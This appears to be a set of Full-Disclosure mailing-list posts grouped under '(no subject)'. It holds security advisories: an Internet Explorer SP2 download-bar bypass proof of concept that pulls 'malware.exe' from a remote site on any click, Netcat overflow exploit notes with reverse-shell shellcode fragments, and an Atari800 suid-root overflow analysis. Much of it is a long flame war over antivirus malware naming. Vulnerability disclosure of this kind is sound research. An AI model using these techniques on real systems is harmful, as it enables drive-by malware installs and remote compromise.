[Full-Disclosure] (no subject)
And why should we even care :-/ ? - Original Message - Whats wrong with slashdot this morning? ___ Full-Disclosure - We believe in it. Charter: http://lists.netsys.com/full-disclosure-charter.html ___ Full-Disclosure - We believe in it. Charter: http://lists.netsys.com/full-disclosure-charter.html
[Full-Disclosure] (no subject)
___ Full-Disclosure - We believe in it. Charter: http://lists.netsys.com/full-disclosure-charter.html
[Full-Disclosure] (no subject)
~~~ Application: Internet Explorer Vendors: http://www.microsoft.com Versions: 6.0.2900.2180.xpsp_sp2_rtm.040803-2158 Patched With: SP2; Platforms: Windows Bug: Remote File Download Information Bar Bypass Exploitation: Remote with browser Date: 13 Jan 2005 Author:Rafel Ivgi, The-Insider e-mail:[EMAIL PROTECTED] web: http://theinsider.deep-ice.com ~~~ 1) Introduction 2) Bugs 3) The Code ~~~ === 1) Introduction === Internet Explorer is currently the most common internet browser in the world. Microsoft Windows XP Service Pack 2 was designed to block any file download by an information bar which must be clicked and selected with Download File. ~~~ == 2) Bug == While trying to download a file Microsoft Internet Explorer the user gets the information bar. The information bar mechanism blocks/catches all references to download-able files, even through javascripts and HTML Event properties. However Microsoft's Internet Explorer (SP2) DOES NOT CATCH body tag with the HTML onclick event which dynamically created iframe tags. For a good, more complicated dynamic object creation i used the createElement function. This way an attacker can make a user download a file with him just clicking anywhere on the page (not on an hyperlink). ~~~ === 3) The Code === Paste into an htm/html file and add at the begining of each line: cut here -- !DOCTYPE HTML PUBLIC -//W3C//DTD HTML 4.0 Transitional//EN !-- saved from url=(0031)http://theinsider.deep-ice.com/ -- HTMLHEADTITLEThe-Insider http://theinsider.deep-ice.com/TITLE META http-equiv=expires content=01 Jan 1998 01:01:00 GMT META http-equiv=Content-Type content=text/html; charset=windows-1252 META http-equiv=Content-Language content=en-us META content=True name=HandheldFriendly META content=MSHTML 6.00.2900.2523 name=GENERATOR/HEAD embed body onclick='a=document.createElement(\iframe src=\http:\/ \/theinsider.deep- ice.com\/malware.exe/iframe\);document.body.appendChild (a);setTimeout(document.execCommand\(\refresh\),1000)' cebterbrbrbrbrbrbrClick AnyWhere You Want/center /BODY/HTML cut here -- ~~~ --- Rafel Ivgi, The-Insider http://theinsider.deep-ice.com Scripts and Codes will make me D.O.S , but they will never HACK me. -- ___ Sign-up for Ads Free at Mail.com http://promo.mail.com/adsfreejump.htm ___ Full-Disclosure - We believe in it. Charter: http://lists.netsys.com/full-disclosure-charter.html
Re: [Full-Disclosure] (no subject)
Hello, Berend-Jan Wever! Here's an exploit for the ANI stack overflow, written for win2ksp4en, IE SP1. Dunno if it will work for other platforms, might need some more tweaking of the ani file. Let me know if it doesn't work, but only if you can hand me some proper debugging details. Since my ISP detects it as Exploit.HTML.IFrameBOF-4 I put the thing in a password protected zip file. The password is margrieta. PGP: key ID 0x48479882 Could you send a PGP signature for your zip? -- Best regards, Raoul Nakhmanson-Kulish Elfor Soft Ltd., ERP Department http://www.elforsoft.ru/ ___ Full-Disclosure - We believe in it. Charter: http://lists.netsys.com/full-disclosure-charter.html
[Full-Disclosure] (no subject)
December 26, 2004 Hat-Squad Advisory: Remote buffer overflow in Netcat TCP/IP Swiss Army Knife Product: Netcat - nc11nt.zip Vendor Url: http://www.securityfocus.com/tools/139/scoreit Version: Netcat v1.1 Vulnerability: Remote stack overflow in the DNS control part Release Date: 26 December, 2004 Vendor Status: Informed on 10 November 2004 Response: 11 November 2004 No fix Overview: The program 'netcat' is an advanced form of the Telnet command when used in a hackers hands. Netcat is a simple Unix utility which reads and writes data across network connections, using TCP or UDP protocol. It is designed to be a reliable back-end tool that can be used directly or easily driven by other programs and scripts. At the same time, it can also be used as a network debugging and exploration tool, since it can create almost any kind of connection you would need and has several interesting built-in capabilities. Standard input is normally sent to the host, and anything that comes back across the connection is sent to standard output. This continues indefinitely, until the network side of the connection shuts down. Netcat can also function as a server, by listening for inbound connections on arbitrary ports and then doing the same reading and writing. Problem: 1. Stack based Buffer Overflow: Due to a boundary check bug in the DNS part, sending a client command with more than 256 bytes will cause a stack buffer overflow. This vulnerability can compromise several tools working without port listener as the the set of tools uw-imapd (www.washington.edu/imap/), loaded with netcat , this is tested wulnerable. Read the PoC code if you need more informations on this vulnerability. Discovery and Proof Of Concept Exploit by class101 ([EMAIL PROTECTED]) Greetings to Nima Majidi and Behrang Fouladi! -=Hat-Squad.com=- -- /* Netcat v1.1, -e Switch, Remote Buffer Overflow Exploit v0.1 Homepage..: http://www.securityfocus.com/tools/139/scoreit Affected versions.: v1.1 Fix...: Actually none, Hobbit is warned 1 month+ ago, and looks like to not act, we let him to spread a backdoor :) Risk..: Highly critical. -Almost everything loaded as nc ... -e ... is vulnerable -Educational tools such as the uw-imapd (http://www.washington.edu/imap/) contains no port listener, if it's loaded with netcat (ie: nc -L -p 143 -t -e imapd.exe 25 -t -e pop3d.exe etc..vulnerable..) this small example show you the large impact of this hole. -Tools build on netcat , I guess are vulnerable , such as the netcat with authentification or others tools based on netcat without a security check on src. -Next time you run netcat -e , be sure of what you run because as said Hobbit, the -e switch is really DANGEROUS!! :DDD Compilation...: 101_ncat.cpp . Win32 (MSVC,cygwin) 101_ncat.c ... Linux (FreeBSD,etc..) Greetings.: Nima Majidi, Behrang Fouladi (cool teammates ;p) DiabloHorn, kimatrix (KD-Team guys) Nicolas Waisman, MMiller(skape), H.D Moore, BJWever (for the help) Brett Moore (for all help and specially there for suggesting me that way of MSVCRT.system call ; call system() mov eax,1656E64h ; mov cmd + 01010101 to eax sub eax,01010101h ; sub 01010101 push eax ; Push cmd on stack with our null byte :) push esp ; Location to cmd call ebp ; Call system() via that way you can push on the stack \x00cmd without breaking your payload. Because in the public shellcode that he published on mailinglist ; Call system() push 20646D63h ; Push cmd on stack, null exists from above push esp; Location to cmd call ebp; Call system() Sure it's smaller to push direclty \x20cmd but MSVCRT.system was also grabbing invalid unicode chars before \x20cmd including esp pointing to cmd (windows bug ?:)(on w2k sp4 server). Else to bypass a bad char , I do a small change ,adding 6 nop, to kick out \x0A bugging there for netcat and prolly more. This to finally say that the size of the shellcode is now 220 bytes instead of 205 (still awesome for a reversecmd generic win32 shellcode) Tested working on W2k SP4,XP all SP. Excellent job by Brett Moore wich I throw all credits because this shellcode is the brain of that exploit ;) Extra.: !All tests were made on nc.exe from http://www.securityfocus.com/tools/139/scoreit! !All tests were made loading netcat: nc -L -p 143 -t -e c:\imapd.exe!
[Full-Disclosure] (no subject)
Had a mistake in my code o well. Works now PoC: http://www.michaelevanchik.com/security/microsoft/ie/xss/index.html http://www.michaelevanchik.com/security/microsoft/ie/xss/writehta.txt -- avp's should add this Here is some new adodb code AVP's should add. No longer needed to connect to external source. Malicious recordset can be built locally. www.michaelevanchik.com ___ Full-Disclosure - We believe in it. Charter: http://lists.netsys.com/full-disclosure-charter.html
[Full-Disclosure] (no subject)
___ Full-Disclosure - We believe in it. Charter: http://lists.netsys.com/full-disclosure-charter.html
[Full-Disclosure] (no subject)
Name: Atari800 Vendor URL: http://atari800.sourceforge.net/ Author: Adam Zabrocki [EMAIL PROTECTED] Date: November 20, 2004 Issue: Atari800 - free and portable Atari800/XL/XE/5200 emulator allows attacker to execute shellcode with privileges suid root, where Atari800 is installed. Description: Atari800 is free and portable Atari800/XL/XE/5200 emulator, originally written by David Firth and now developed by the Atari800 Development Team. This program is copyrighted and released under the GPL. Details: Possible execute shellcode by function Aprint(), bad called in function Atari800_Initialise() Local users, able to run atari800 (in default installation atari800 have suid root) are able to execute shellcode with root privileges. The problem lies in Atari800_Initialise() function, which do bad call for function Aprint(). src/atari.c int Atari800_Initialise(int *argc, char *argv[]) { int error = FALSE; ... ... ... ... /* * Any parameters left on the command line must be disk images. */ for (i = 1; i *argc; i++) { if (!SIO_Mount(diskno++, argv[i], FALSE)) { ![1]! Aprint(Disk File %s not found, argv[i]); error = TRUE; } } if (error) { ![2]! Aprint(Usage: %s [options] [diskfile1...diskfile8], argv[0]); Aprint(\t-help Extended Help); Atari800_Exit(FALSE); return FALSE; } ... ... } Function Aprint() is written by program's autors. src/log.c void Aprint(char *format, ... ) { va_list args; char buffer[256]; #ifdef BUFFERED_LOG int buflen; #endif va_start(args, format); vsprintf(buffer, format, args); va_end(args); #ifdef BUFFERED_LOG strcat(buffer, \n); buflen = strlen(buffer); if ((strlen(memory_log) + strlen(buffer) + 1) MAX_LOG_SIZE) *memory_log = 0; strcat(memory_log, buffer); #else printf(%s\n, buffer); #endif } We can control argument argv[0] which is given for function Aprint(), which do call for vsprintf() function and in the and can do overflow. When we create symlink to real path to atari800 argv[0] will be changed. Exploiting this bug can gave root privileges. This bug exist in older Atari800 (i read source with version 1.3.0), in the lasted version there isn't overflow in Aprint() function. It was rewrited! Atari800 have other bugs who exist when program read config file. Bugs Exists in function RtConfigLoad() src/rt-config.c int RtConfigLoad(const char *alternate_config_filename) { FILE *fp; const char *fname = rtconfig_filename; int status = TRUE; char string[256]; char *ptr; ... ... while (fgets(string, sizeof(string), fp)) { RemoveLF(string); ptr = strchr(string, '='); if (ptr) { *ptr++ = '\0'; if (strcmp(string, OS/A_ROM) == 0) ![3]! strcpy(atari_osa_filename, ptr); else if (strcmp(string, OS/B_ROM) == 0) ![4]! strcpy(atari_osb_filename, ptr); else if (strcmp(string, XL/XE_ROM) == 0) ![5]! strcpy(atari_xlxe_filename, ptr); else if (strcmp(string, BASIC_ROM) == 0) ![6]! strcpy(atari_basic_filename, ptr); else if (strcmp(string, 5200_ROM) == 0) ![7]! strcpy(atari_5200_filename, ptr); else if (strcmp(string, DISK_DIR) == 0) { if (disk_directories == MAX_DIRECTORIES) printf(All disk directory slots used!\n); else ![8]! strcpy(atari_disk_dirs[disk_directories++], ptr); } else if (strcmp(string, ROM_DIR) == 0) ![9]! strcpy(atari_rom_dir, ptr); else if (strcmp(string, H1_DIR) == 0) ![10]! strcpy(atari_h1_dir, ptr); else if (strcmp(string, H2_DIR) == 0) ![11]! strcpy(atari_h2_dir, ptr); else if (strcmp(string, H3_DIR) == 0) ![12]! strcpy(atari_h3_dir, ptr); else if (strcmp(string, H4_DIR) == 0) ![13]! strcpy(atari_h4_dir, ptr); ... else if (strcmp(string, EXE_DIR) == 0) ![14]! strcpy(atari_exe_dir, ptr);
[Full-Disclosure] (no subject)
Please make a note of this email address change. For business related items, please contact me at [EMAIL PROTECTED] For personal emails, please contact me at [EMAIL PROTECTED] Thank you! ___ Full-Disclosure - We believe in it. Charter: http://lists.netsys.com/full-disclosure-charter.html
[Full-Disclosure] (no subject)
Oh my Gawd! I think I've fallen in love! You will be hearing from me soon! --__--__-- Message: 4 Date: Wed, 13 Oct 2004 10:28:40 -0700 (MST) From: Jay Jacobson [EMAIL PROTECTED] To: Mr. Rufus Faloofus [EMAIL PROTECTED] cc: [EMAIL PROTECTED] Subject: Re: [Full-Disclosure] Nessus experience SNIP Of course, another good place for these questions would be the Nessus mailing list. You may also want to check out Edgeos' Nessus Knowledge Base, which documents every configuration option in Nessus http://www.edgeos.com/nessuskb/. -- .. .. Jay Jacobson .. Edgeos, Inc. - 480.961.5996 - http://www.edgeos.com .. .. Network Security Auditing and .. Vulnerability Assessment Managed Services .. --__--__-- thank you Randall M ___ Full-Disclosure - We believe in it. Charter: http://lists.netsys.com/full-disclosure-charter.html
Re: [Full-Disclosure] (no subject) (try using a friggin subject line...)
-BEGIN PGP SIGNED MESSAGE- Hash: SHA1 who are you friggen Dr Evil? On Friday 13 August 2004 07:04 pm, KF_lists wrote: Insert subject here ^ -KF ___ Full-Disclosure - We believe in it. Charter: http://lists.netsys.com/full-disclosure-charter.html -BEGIN PGP SIGNATURE- Version: GnuPG v1.2.4 (GNU/Linux) iD8DBQFBHsvzQEDQWvlbVLkRAls1AJ9il79zClgYJinxFJrZFILdbw6v7QCeLhQa 12Xv/+oYjPxty8GdJmRqGHw= =kKb6 -END PGP SIGNATURE- ___ Full-Disclosure - We believe in it. Charter: http://lists.netsys.com/full-disclosure-charter.html
Re: [Full-Disclosure] (no subject) (try using a friggin subject line...)
I'm Rick James bitch! -KF Adam wrote: who are you friggen Dr Evil? On Friday 13 August 2004 07:04 pm, KF_lists wrote: Insert subject here ^ -KF ___ Full-Disclosure - We believe in it. Charter: http://lists.netsys.com/full-disclosure-charter.html ___ Full-Disclosure - We believe in it. Charter: http://lists.netsys.com/full-disclosure-charter.html
Re: [Full-Disclosure] (no subject)
On Sun, Aug 15, 2004 at 01:52:33PM +0200, Maarten wrote: On Sunday 15 August 2004 04:52, Nick FitzGerald wrote: Maarten wrote: yada yada. You may work in the industry (and be blind because of it) and I may have an incredible high IQ (so much higher than yours that you perceive I'm stupid instead). But the thing is, you don't know that. So stop bashing me and showing off. You can shine by your actions, not by your reputation... So what is your knowledge about malware naming ? You know about the wildlist and its problems, Vgrep, CARO, 'naming.txt' and its use in the last 10 years ? You have ever tried to maintain and work with a malware collection ? You know about previous (and more in-depth) discussions on this topic ? You've read at least http://www.securityfocus.com/infocus/1587 and http://www.virusbtn.com/magazine/archives/200301/caro.xml to get a basic idea of the problem ? So what rational fact makes you believe you know this better than everyone else ? All change starts small. Maybe discussions such a this will wake people up, maybe there will even be a voiced demand from the public. That DOES hurt sales, thus shareholders, which is what you need to have done, right ? The only thing I'm sure about is, YOU will not be instrumental in this. Do you really think, there were any new ideas here ? For an example, here at the antiVirusTestCenter we have discussed the naming problems for years. But even the partial solutions that have been realized (LOKMM, VMacro-Server) haven't caused significant changes. And this was in cooperation with many AV researchers. How should such an annoying thread like this really help ? Do you also believe you can convince MS to make Windows OpenSource just by posting here ? Well, just for you, to make it simple. At Time T you find a virus and name it whatever you like (just as you do now). From time T until T+48h you have the all-important hours of confusion as you are so adamant to repeat at every opportunity. So let there be confusion. At Time T+50 you agree upon a singular standardized name and rename it. So, compared to now, what has changed between T and T+48 ?? Nothing. So stop complaining about me messing up those all-important hours of yours. I'm not messing anything up. I'm renaming when the panic has died down. Get it now ?!?! And what is the benefit of your proposal? Have you considered that it may be just another source of confusion ? There could be uncoordinated renamings, the same malware alerts with old and new names (but this time from the same vendor). Adminstrators may not be able to compare scan reports from different malware definition updates because the names changed in between. The first few hours _under current processes_ produce nearly all of the confusion caused by naming inconsistencies. Media outlets latch onto This is not a scientific fact, and I do not agree with you. I can't remember _any_ scientific fact in this thread. -- Michel Messerschmidt [EMAIL PROTECTED] antiVirusTestCenter, Computer Science, University of Hamburg ___ Full-Disclosure - We believe in it. Charter: http://lists.netsys.com/full-disclosure-charter.html
Re: [Full-Disclosure] (no subject) BORING
This is too boring. *Please* can you all desist? Entrenched positions aren't going to be changed by this back-biting, flaming and personal attacks (you know who you are). You're damaging your own repuations on this thread. Don't forget it's all searchable on Google. This thread has been going on for too long. Do you also believe you can convince MS to make Windows OpenSource just by posting here? No. Maybe discussions such a this will wake people up, maybe there will even be a voiced demand from the public. Maybe not. This isn't the forum for such 'discussions'. This is supposed to be a list for disclosing new and/or relevant information about security threats. OK? --- Dictionary.com troll: An electronic mail message, Usenet posting or other (electronic) communication which is intentionally incorrect, but not overtly controversial (compare flame bait), or the act of sending such a message. Trolling aims to elicit an emotional reaction from those with a hair-trigger on the reply key. A really subtle troll makes some people lose their minds. I'm sure it's not intentionally incorrect but apart from that ... --- Does HoTMaiL come with a spell checker? --- On Sun, Aug 15, 2004 at 01:52:33PM +0200, Maarten wrote: On Sunday 15 August 2004 04:52, Nick FitzGerald wrote: Maarten wrote: yada yada. You may work in the industry (and be blind because of it) and I may have an incredible high IQ (so much higher than yours that you perceive I'm stupid instead). But the thing is, you don't know that. So stop bashing me and showing off. You can shine by your actions, not by your reputation... So what is your knowledge about malware naming ? You know about the wildlist and its problems, Vgrep, CARO, 'naming.txt' and its use in the last 10 years ? You have ever tried to maintain and work with a malware collection ? You know about previous (and more in-depth) discussions on this topic ? You've read at least http://www.securityfocus.com/infocus/1587 and http://www.virusbtn.com/magazine/archives/200301/caro.xml to get a basic idea of the problem ? So what rational fact makes you believe you know this better than everyone else ? All change starts small. Maybe discussions such a this will wake people up, maybe there will even be a voiced demand from the public. That DOES hurt sales, thus shareholders, which is what you need to have done, right ? The only thing I'm sure about is, YOU will not be instrumental in this. Do you really think, there were any new ideas here ? For an example, here at the antiVirusTestCenter we have discussed the naming problems for years. But even the partial solutions that have been realized (LOKMM, VMacro-Server) haven't caused significant changes. And this was in cooperation with many AV researchers. How should such an annoying thread like this really help ? Do you also believe you can convince MS to make Windows OpenSource just by posting here ? Well, just for you, to make it simple. At Time T you find a virus and name it whatever you like (just as you do now). From time T until T+48h you have the all-important hours of confusion as you are so adamant to repeat at every opportunity. So let there be confusion. At Time T+50 you agree upon a singular standardized name and rename it. So, compared to now, what has changed between T and T+48 ?? Nothing. So stop complaining about me messing up those all-important hours of yours. I'm not messing anything up. I'm renaming when the panic has died down. Get it now ?!?! And what is the benefit of your proposal? Have you considered that it may be just another source of confusion ? There could be uncoordinated renamings, the same malware alerts with old and new names (but this time from the same vendor). Adminstrators may not be able to compare scan reports from different malware definition updates because the names changed in between. The first few hours _under current processes_ produce nearly all of the confusion caused by naming inconsistencies. Media outlets latch onto This is not a scientific fact, and I do not agree with you. I can't remember _any_ scientific fact in this thread. -- Michel Messerschmidt [EMAIL PROTECTED] antiVirusTestCenter, Computer Science, University of Hamburg ___ Full-Disclosure - We believe in it. Charter: http://lists.netsys.com/full-disclosure-charter.html _ It's fast, it's easy and it's free. Get MSN Messenger today! http://www.msn.co.uk/messenger ___ Full-Disclosure - We believe in it. Charter: http://lists.netsys.com/full-disclosure-charter.html
Re: [Full-Disclosure] (no subject)
Nick et al... After having really suffered the thread(S) what is missing is. Most SysAdmins do not know what it takes to run a business. Most Business Administrators do not know what it takes to run a network. With that said Maarten will never understand the Business Point that you are making, nor will most other SysAdmins. The bottom line is no matter how many technical people would like it or it would actually make Sense AND make Everyone's lives easier. The bean counters prevent it, there is no Profit. At 02:52 PM 8/15/2004 +1200, Nick FitzGerald wrote: Maarten wrote: First off: Nick, please lose that damn attitude of yours ! Why? You're clearly ignorant of what you are talking about, yet you speak with an air as if you do know something about the topic. Further, your ignorance would have been cured by carefully reading all of the foregoing thread. There's a point where the idiocy and chutzpah that several have shown in this thread makes them no longer worthy of polite consideration and at that point I usually adopt the beat it into them in case that helps approach... Further, by hammering on the endless we-have-done-it-for-many-years-so-who are-you-to-tell-us-differently part you're actually making yourself part of the problem, not part of the solution. You show more and more of your ignorance each time you open your mouth. _If_ this problem is ever solved, it is very likely that I will have been a not insignificant part of that solution. I can't prove that to you but it is just one of those things and probably undeniable to anyone who knows what they are talking about when discussing this problem. You're saying that internal procedures make it so difficult to adapt names after the fact. When in fact the strength of a company, any company, IS to be able to adapt to changing circumstances. And if they're not able to, eventually they will go the way of the dinosaurs. You are confusing two different aspects of the AV industry. Yes, the industry has to be quite flexible and able to quickly react to significant shifts in the malware detection problem set. That does not mean it has to be equally flexible (or even flexible in the tiniest little bit) when it comes to malware naming, as the last 15 years of commercial AV software development, marketing and sales prove. Your suggestion is found wanting in the light of significant history -- care to make some more obviously uninformed comments?? The only thing Todd (and I) are trying to say is that it is possible to rename after the fact. ... Of course it is. I never denied that. I have, however, pointed out several reasons why that generally doesn't happen, why that situation is very unlikely to change _AND_ why it would not be particularly helpful even if it did change. In response to those explanations you and Todd (and some others) just keep dumbly repeating but they should change. Something we both agree on. The difference is that in designing a better naming system, I am not limited to parrotting stupid inanities about things I don't understand -- I can analyse the history in multi-layered and interacting terms of the industry's technical, economic and political development, its current internal culture, place that in larger market and political contexts, and as a result make useful suggestions that are much more likely to be adopted inside the industry and that mean the industry can change to better suit those external factors. I can also advise those outside AV what elements of those environments they may best and most easily change to increase the likelihood the AV industry will make suitable changes. I await your parrot squawk response... NOT! ... I don't #!%$* care how many old Cobol programs need adapting for that to get possible, but the fact remains that it IS. _Theoretically_, yes. I have now lost track of how many times I have agreed with you (and others) on this now. The larger and much more salient fact is that, in today's market (and everything that has gone before it), there is no compelling reason for several of the very large players to make the expenditure and introduce the huge upheavals to internal processes (that are clearly working because these companies have not gone the way of the dinosaurs and, to the contrary, are experiencing some of their strongest growth ever) that fixing the naming problem will require. Don't start again about how your current procedures may prevent or complicate that. Worse integration problems, by far more complex and bigger companies or conglomerates are being tackled every day. Yeah. To name a few ? How about mergers, or international intelligence-exchange between law enforcement agencies. Do you think that they let anyone stop them by complaining that database format X isn't readily compatible with format Y ? No. They fix it, they make it work together no matter what. So don't start about how impossible it is for you to rename one simple
Re: [Full-Disclosure] (no subject)
On Sunday 15 August 2004 04:52, Nick FitzGerald wrote: Maarten wrote: First off: Nick, please lose that damn attitude of yours ! Why? Because you're being rude, and anti-social. You don't score points with this. Jeez why do I even HAVE to explain things like this. SO typical. You're clearly ignorant of what you are talking about, yet you speak with an air as if you do know something about the topic. Further, your ignorance would have been cured by carefully reading all of the foregoing thread. There's a point where the idiocy and chutzpah that several have shown in this thread makes them no longer worthy of polite consideration and at that point I usually adopt the beat it into them in case that helps approach... yada yada. You may work in the industry (and be blind because of it) and I may have an incredible high IQ (so much higher than yours that you perceive I'm stupid instead). But the thing is, you don't know that. So stop bashing me and showing off. You can shine by your actions, not by your reputation... Further, by hammering on the endless we-have-done-it-for-many-years-so-who are-you-to-tell-us-differently part you're actually making yourself part of the problem, not part of the solution. You show more and more of your ignorance each time you open your mouth. You ARE part of the problem ! You leave no opportunity unused to bash opponents instead of using solid arguments. _If_ this problem is ever solved, it is very likely that I will have been a not insignificant part of that solution. I can't prove that to you but it is just one of those things and probably undeniable to anyone who knows what they are talking about when discussing this problem. Which coincidentally, by your own admission, would be only you. So you're effectively saying: I will probably agree with myself. Well, whoopty-doo... big surprise there. You're saying that internal procedures make it so difficult to adapt names after the fact. When in fact the strength of a company, any company, IS to be able to adapt to changing circumstances. And if they're not able to, eventually they will go the way of the dinosaurs. You are confusing two different aspects of the AV industry. Yes, the industry has to be quite flexible and able to quickly react to significant shifts in the malware detection problem set. That does not mean it has to be equally flexible (or even flexible in the tiniest little bit) when it comes to malware naming, as the last 15 years of commercial AV software development, marketing and sales prove. Your suggestion is found wanting in the light of significant history -- care to make some more obviously uninformed comments?? I'm not confusing anything. The statement about needing to be flexible applies to ALL companies, on ALL aspects. It is stupid to think that a company can be inflexible in one thing while being flexible in another. The only thing Todd (and I) are trying to say is that it is possible to rename after the fact. ... Of course it is. I never denied that. Yes, you did. I have, however, pointed out several reasons why that generally doesn't happen, why that situation is very unlikely to change _AND_ why it would not be particularly helpful even if it did change. In response to those explanations you and Todd (and some others) just keep dumbly repeating but they should change. Something we both agree on. The difference is that in designing a better naming system, I am not limited to parrotting stupid inanities about things I don't understand -- I can analyse the history in multi-layered and interacting terms of the industry's technical, economic and political development, its current internal culture, place that in larger market and political contexts, and as a result make useful suggestions that are much more likely to be adopted inside the industry and that mean the industry can change to better suit those external factors. I can also advise those outside AV what elements of those environments they may best and most easily change to increase the likelihood the AV industry will make suitable changes. No, you're a shining example of being too close to your subject to have an impartial and unclouded view. I await your parrot squawk response... NOT! I'm happy to say I don't care whether you await it or not. ... I don't #!%$* care how many old Cobol programs need adapting for that to get possible, but the fact remains that it IS. _Theoretically_, yes. I have now lost track of how many times I have agreed with you (and others) on this now. The larger and much more salient fact is that, in today's market (and everything that has gone before it), there is no compelling reason for several of the very large players to make the expenditure and introduce the huge upheavals to internal processes (that are clearly working because these companies have not gone the way of the dinosaurs
RE: [Full-Disclosure] (no subject)
Brad Griffin wrote: big snip I can't understand how the Google research is a problem with naming conventions. Google for a virus name and multiple hits come up, mostly for descriptions on a/v sites that also carry the alias names in most cases. The problem with such Google research (or with using VGrep) is that it is too much after the event. As I keep saying, and as admins everywhere keep agreeing with me, the biggest part of the naming inconsistency problem occurs in the first few hours of an outbreak (or suspected outbreak) event. Neither Google nor VGrep can help you then... Some AV developers have taken more care to list the names they know their competitors are using by the time they post a web description of a new virus, and some make the effort to update that list for the hours or days following an outbreak, at least for high interest viruses but that is only a partial solution to the problem. -- Nick FitzGerald Computer Virus Consulting Ltd. Ph/FAX: +64 3 3529854 ___ Full-Disclosure - We believe in it. Charter: http://lists.netsys.com/full-disclosure-charter.html
Re: [Full-Disclosure] (no subject)
Maarten wrote: First off: Nick, please lose that damn attitude of yours ! Why? You're clearly ignorant of what you are talking about, yet you speak with an air as if you do know something about the topic. Further, your ignorance would have been cured by carefully reading all of the foregoing thread. There's a point where the idiocy and chutzpah that several have shown in this thread makes them no longer worthy of polite consideration and at that point I usually adopt the beat it into them in case that helps approach... Further, by hammering on the endless we-have-done-it-for-many-years-so-who are-you-to-tell-us-differently part you're actually making yourself part of the problem, not part of the solution. You show more and more of your ignorance each time you open your mouth. _If_ this problem is ever solved, it is very likely that I will have been a not insignificant part of that solution. I can't prove that to you but it is just one of those things and probably undeniable to anyone who knows what they are talking about when discussing this problem. You're saying that internal procedures make it so difficult to adapt names after the fact. When in fact the strength of a company, any company, IS to be able to adapt to changing circumstances. And if they're not able to, eventually they will go the way of the dinosaurs. You are confusing two different aspects of the AV industry. Yes, the industry has to be quite flexible and able to quickly react to significant shifts in the malware detection problem set. That does not mean it has to be equally flexible (or even flexible in the tiniest little bit) when it comes to malware naming, as the last 15 years of commercial AV software development, marketing and sales prove. Your suggestion is found wanting in the light of significant history -- care to make some more obviously uninformed comments?? The only thing Todd (and I) are trying to say is that it is possible to rename after the fact. ... Of course it is. I never denied that. I have, however, pointed out several reasons why that generally doesn't happen, why that situation is very unlikely to change _AND_ why it would not be particularly helpful even if it did change. In response to those explanations you and Todd (and some others) just keep dumbly repeating but they should change. Something we both agree on. The difference is that in designing a better naming system, I am not limited to parrotting stupid inanities about things I don't understand -- I can analyse the history in multi-layered and interacting terms of the industry's technical, economic and political development, its current internal culture, place that in larger market and political contexts, and as a result make useful suggestions that are much more likely to be adopted inside the industry and that mean the industry can change to better suit those external factors. I can also advise those outside AV what elements of those environments they may best and most easily change to increase the likelihood the AV industry will make suitable changes. I await your parrot squawk response... NOT! ... I don't #!%$* care how many old Cobol programs need adapting for that to get possible, but the fact remains that it IS. _Theoretically_, yes. I have now lost track of how many times I have agreed with you (and others) on this now. The larger and much more salient fact is that, in today's market (and everything that has gone before it), there is no compelling reason for several of the very large players to make the expenditure and introduce the huge upheavals to internal processes (that are clearly working because these companies have not gone the way of the dinosaurs and, to the contrary, are experiencing some of their strongest growth ever) that fixing the naming problem will require. Don't start again about how your current procedures may prevent or complicate that. Worse integration problems, by far more complex and bigger companies or conglomerates are being tackled every day. Yeah. To name a few ? How about mergers, or international intelligence-exchange between law enforcement agencies. Do you think that they let anyone stop them by complaining that database format X isn't readily compatible with format Y ? No. They fix it, they make it work together no matter what. So don't start about how impossible it is for you to rename one simple entry. Both your belief in, and your abject inability to see, your own ignorance are truly astonishing! As Valdis (?) has already addressed the most egregious flaws of your logic here, I'll move on other, more AV-specific issues. To conclude, I'd like to put serious question marks by your statement that the first few hours are the all-important ones. First off, by renaming after the fact (after the first few hours/days/weeks) no-one is changing ANYTHING about those first hours so you shouldn't have
[Full-Disclosure] (no subject) Why not?
Brad Griffin wrote: I am yet to come across a 'large' company or enterprise that uses separate brand av applications for desktop and server solutions. It makes economic and logistic sense to use one vendor for your av solution that is deployed at different levels (or layers if you prefer that terminology). About the only people I've seen use different antivirus products in one environment are home users or small businesses that misinterpret 'layers of defence' in an anti-virus context to mean 'different brands of defence'. Considering that many major av co's products are cross platform nowadays, I doubt many companies will continue using separate brand products in a mixed OS environment for much longer either. Reply: The last two companies I have worked for, one a Fortune 500 company, the other a smallish science company, both use multiple products. One uses Symantec on the Windows servers and McAfee on the Windows workstations and Clam on the Linux servers and workstations. The other uses Clam on its Linux servers and Panda on its Windows servers and workstations. Of course, that hasn't completely stopped virus outbreaks, just because there's no way that new definitions can be rolled out quickly enough. As you might expect, Windows laptops were the main culprits. But I have seen Linux viruses and breakins as well as Windows hacks too. And please don't say that the IT wasn't doing its job. As long as you have an internet presence you are a target, and none of the products are 100% secure ... Cisco anyone? So there you go. My two Euros worth. Does anyone remember the AV scanner that came with MS-DOS6? Haha --- Does HoTMaiL come with a spell checker? --- _ Use MSN Messenger to send music and pics to your friends http://www.msn.co.uk/messenger ___ Full-Disclosure - We believe in it. Charter: http://lists.netsys.com/full-disclosure-charter.html
Re: [Full-Disclosure] (no subject)
I can easily understand how someone unversed in the _market forces_ pertaining to antivirus software could hold that position, and as a theoretical solution to the problem of lack of cross-vendor naming coordination it has often been suggested even by though who know it would never work in the real world. Neat and tidy as such a solution seems, it will not, however, work. As I explained in other of my posts in this and the related AV Naming Convention thread, in general by far the largest cost of naming disagreement is borne by the users in the early hours of large-scale outbreaks. Thus, a solution that specifically _requires_ all vendors to use a different name until a name is agreed (no matter what this process it will take some _additional_ time) is, by design, an _anti- solution_ as such a solution, by design, ensures perfect naming inconsistency at the time the highest cost of naming inconsistency is borne. Vendors should not have to use a different name until the real one is detrermined, they should use whatever they want to. You know what, I don't work in the anti-virus field, but what you are saying is BS. There is no good reason that I can think of that the AV companies cannot rename these things after the fact. When an outbreak happens, they provide a fix and name it whatever they want. After the fact, they could rename things and their updates reflect the proper name. They can keep a reference to their name in the description, what's a few more characters in the signature files for every piece of malware going to matter? another 100k in a download at most? I agree that there is probably a lot of marketing pressure that may make this difficult, but there is no technical reason for it. The AV companies cannot be that lame that they cannot handle a simple name change. I mean we use databases and other things and using these computers that should make this easy. If thay are that lame, maybe they shouldn't be in busines. It's up to people like us that read lists like this to make them fix this silly problem, or we can ignore it. It doesn't affect me much, it just seems silly that they cannot name things consistently. Secondly, one of the greatest impediments to ongoing (as opposed to initial, outbreak-phase) naming inconsistency is that many vendors do not have internal processes robust enough to easily handle renaming This is a lame excuse at best, maybe these companies need to redesign themselves, this should not be a big problem. (And please, before replying to this message, please, please, please, please, please read 